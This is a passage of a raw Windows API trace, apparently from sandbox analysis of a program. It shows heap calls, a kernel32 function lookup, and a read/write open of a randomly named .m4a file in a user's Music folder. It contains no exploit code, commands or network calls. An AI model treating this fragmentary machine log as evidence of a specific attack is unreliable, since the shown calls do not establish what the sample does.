hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0038.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0038.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0038.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0038.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0038.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0038.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0038.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0038.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0038.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0038.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0038.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0038.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0038.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0038.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0038.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0038.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0038.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0038.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0038.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0038.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0038.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0038.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.196] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0038.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0038.196] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0038.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88ce98 [0038.196] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88ce98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0038.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0038.196] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0038.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0038.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0038.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0038.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0038.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0038.196] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0038.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce98 [0038.196] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88ce98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0038.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0038.197] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0038.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0038.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0038.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0038.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0038.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0038.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0038.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0038.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0038.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0038.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xaa0008 [0038.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lWN8-ZQxM7632S6p.m4a", cchWideChar=57, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0038.197] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x39) returned 0x7ab260 [0038.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lWN8-ZQxM7632S6p.m4a", cchWideChar=57, lpMultiByteStr=0x7ab260, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lWN8-ZQxM7632S6p.m4a", lpUsedDefaultChar=0x0) returned 57 [0038.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0038.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0038.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.197] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lWN8-ZQxM7632S6p.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lwn8-zqxm7632s6p.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0038.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0038.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0038.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0038.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0038.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0038.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0038.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0038.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0038.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0038.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0038.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0038.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0038.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0038.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=57, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0038.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x72) returned 0x7800d0 [0038.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=57, lpWideCharStr=0x7800d0, cchWideChar=57 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lWN8-ZQxM7632S6p.m4a") returned 57 [0038.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0038.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0038.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7800d0 | out: hHeap=0x770000) returned 1 [0038.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0038.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0038.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0038.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0038.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0038.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0038.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0038.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0038.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0038.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0038.198] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0038.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0038.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0038.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0038.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0038.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0038.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0038.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0038.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0038.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0038.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0038.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0038.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0038.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0038.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0038.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0038.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0038.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0038.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0038.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0038.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0038.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0038.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0038.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0038.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0038.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0038.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0038.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0038.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0038.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0038.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0038.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0038.199] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0038.200] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0038.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0038.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0038.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0038.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0038.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0038.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0038.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0038.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0038.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0038.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0038.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0038.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0038.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0038.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0038.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0038.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0038.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0038.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0038.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0038.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0038.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0038.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0038.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0038.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0038.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0038.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0038.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0038.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0038.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0038.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0038.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0038.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0038.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0038.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0038.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0038.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.201] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0038.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0038.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0038.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0038.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0038.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0038.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0038.201] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0038.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0038.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0038.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0038.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0038.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0038.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0038.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0038.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0038.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0038.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0038.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0038.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0038.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0038.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0038.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0038.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0038.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0038.202] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0038.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0038.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0038.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0038.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0038.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0038.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0038.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0038.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0038.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0038.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0038.203] 